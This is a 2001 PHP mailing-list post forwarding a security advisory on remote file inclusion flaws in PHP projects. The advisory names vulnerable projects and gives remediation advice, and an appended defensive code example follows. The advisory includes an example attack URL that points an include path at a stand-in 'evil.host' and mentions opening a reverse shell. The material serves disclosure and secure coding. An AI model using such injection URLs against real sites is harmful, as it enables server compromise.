Anyone feel the need to reply to this??
- James
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, October 02, 2001 10:59 PM
Subject: results of semi-automatic source code audit
> /*
> * results of semi-automatic source code audit of a
> * majority of php based open-source projects registered
> * at Freshmeat.net or Sourceforge.net
> *
> * release date: 2001-10-02
> *
> * authors:
> * atil <[EMAIL PROTECTED]>
> * genetics <[EMAIL PROTECTED]>
> * #yaht@ircnet, Yet Another Hacker Team
> */
>
> --=[introduction]=--
> php comes shipped with two features enabled by default that make
> unsuspicious-looking source execute arbitrary code:
> - variables passed from the browser are stored in global context
> - file-system functions work transparently on URLs
>
> --=[background]=--
> These exploits for php are not new and it's not the fault of php or any
> bug in the source of php itself but of the authors of a large number
> of projects written in php. What is new is the extensive audit of a
> huge number of projects and the surprisingly large number of
> vulnerabilities discovered.
>
> --=[our task]=--
> We looked for files often not directly accessed by the browser but
> included from somewhere else that contained something like this:
>
> in helperfunction.php :
> include("$includedir/library.php");
>
> If the variable $includedir is not set by something executed before
> the include-statement, we can override it from the http-client with
> something like this:
>
> http://vuln.host/helperfunction.php?includedir=http://evil.host/code
>
> When the script is executed on vuln.host the php-interpreter will
> fetch the document http://evil.host/code/library.php and execute
> it. Breaking into the system is easy now because you can pass any
> php-source to the vulnerable system (download binaries, execute code,
> start reverse-shells (e.g. "xterm -display evil.host:1")...) that
> will be executed by the user running the web-server (mod_php) or by
> the owner of the virtual-host (CGI-interpreter).
>
> --=[solution]=--
> php is not insecure by default, but makes insecure programming very
> easy. Here are some solutions to write safe php-code:
>
> - give included php-files a filename that is not executed by the
> web-server
>
> - put all included php-code outside the docroot (not possible for
> all users), use file permissions or .htaccess
>
> - use constants (best approach)
>
> in main.php:
> define("MAINFILE", true);
> define("CONFIGDIR", "/some/path/");
> include('./some_function.inc');
>
> in some_function.inc:
> if ( !defined("MAINFILE") ) die ("this is a include file!");
> include(CONFIGDIR . "config.inc");
>
> If you set global variables from the client, they don't
> interfere with constants; the defined-Test is not necessary for
> security.
>
> - use $HTTP_*_VARS and disable global variables from the client
>
> --=[scope]=--
>
> Our audit searched only for vulnerabilities with include-files and can
> never be compared to a detailed analysis of a complete project. If
> your php-project didn't show up on the list below, that doesn't mean
> you can relax now. We want to make people working on all these great
> php projects become sensitive to the fact that using modern
> scripting languages doesn't make your code safe by default.
>
> --=[hint for ISPs]=--
> If you are an ISP and want to identify possible exploitable php code
> on your web-server use this:
>
> find -type f -a -name '*.php*' -print0 |
> xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$'
>
> The resulting files need further manual inspection...
>
> --=[vulnerable projects]=--
> (all maintainers have been informed a while ago)
>
> Actionpoll http://sourceforge.net/projects/actionpoll
> AWOL http://www.freshmeat.net/projects/awol
> CCC http://www.cccsoftware.org
> DarkPortal http://sourceforge.net/projects/darkportal
> Empris http://empris.sourceforge.net
> Moregroupware http://www.moregroupware.org
> Phorecast http://phorecast.org
> Phormation http://www.peaceworks.ca/phormation.php
> pSlash http://www.pslash.com
> The Gallery http://sourceforge.net/projects/gallery
> webodex http://homepage.mac.com/ghorwood/webodex
> Zorbstats http://freshmeat.net/projects/zorbstats
> phpAdsNew http://sourceforge.net/projects/phpadsnew
> myphppagetool http://myphppagetool.sourceforge.net
> ActionPoll http://sourceforge.net/projects/actionpoll
> SIPS http://sips.sourceforge.net
> thatware http://thatware.org
>
> We don't provide the exact vulnerable piece of code but we secured our
> results with at least one machine (mostly the demo-site of the project)
> where we could execute a phpinfo()-script coming from our webserver.
>
> cheers
>
> atil & genetics
>
--
PHP Development Mailing List <http://www.php.net/>
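The "use constants" and "$HTTP_*_VARS" advice from the quoted advisory, worked into a complete two-file layout. This is an added example, not code from the advisory or from any of the listed projects; the paths (/var/www/app-private/), the page whitelist and the file names are assumptions made for the illustration.

```php
<?php
// ---- main.php: the only file the browser requests directly ----
// Assumption: include files live in /var/www/app-private/, outside the
// docroot, so the web-server cannot serve or execute them on their own.

// Constants cannot be overwritten by request variables, even when
// register_globals is on; a "?INCLUDEDIR=http://..." query changes nothing.
define("MAINFILE", true);
define("INCLUDEDIR", "/var/www/app-private/");

// Never build an include path from request data. A client-supplied "page"
// value is only used as a key into this fixed map of real filenames.
$pages = array(
    "home" => "home.inc",
    "poll" => "poll.inc",
);

// Read the parameter explicitly from the request array instead of relying
// on a global $page that register_globals may or may not have populated.
// (PHP 4.1 and later also offer $_GET for the same purpose.)
$requested = isset($HTTP_GET_VARS["page"]) ? $HTTP_GET_VARS["page"] : "home";
if (!isset($pages[$requested])) {
    die("unknown page");
}

require(INCLUDEDIR . "library.inc");       // shared helper functions
require(INCLUDEDIR . $pages[$requested]);  // whitelisted page body only
?>

<?php
// ---- /var/www/app-private/library.inc: must never run on its own ----
// The .inc suffix is not handled by the PHP module, and the directory is
// outside the docroot; the defined() guard is a third, independent layer.
if (!defined("MAINFILE")) {
    die("this is an include file");
}

// Nested includes again go through the constant, never through a variable
// such as $includedir that a request could have set.
require(INCLUDEDIR . "config.inc");

function render_title($text)
{
    // htmlspecialchars() so that data echoed back cannot inject markup.
    return "<h1>" . htmlspecialchars($text) . "</h1>";
}
?>
```

On the server side, `register_globals = Off` in php.ini removes the first precondition named in the advisory and `allow_url_fopen = Off` removes the second, so a remaining `include("$dir/x.php")` can at worst read local files rather than fetch code from another host.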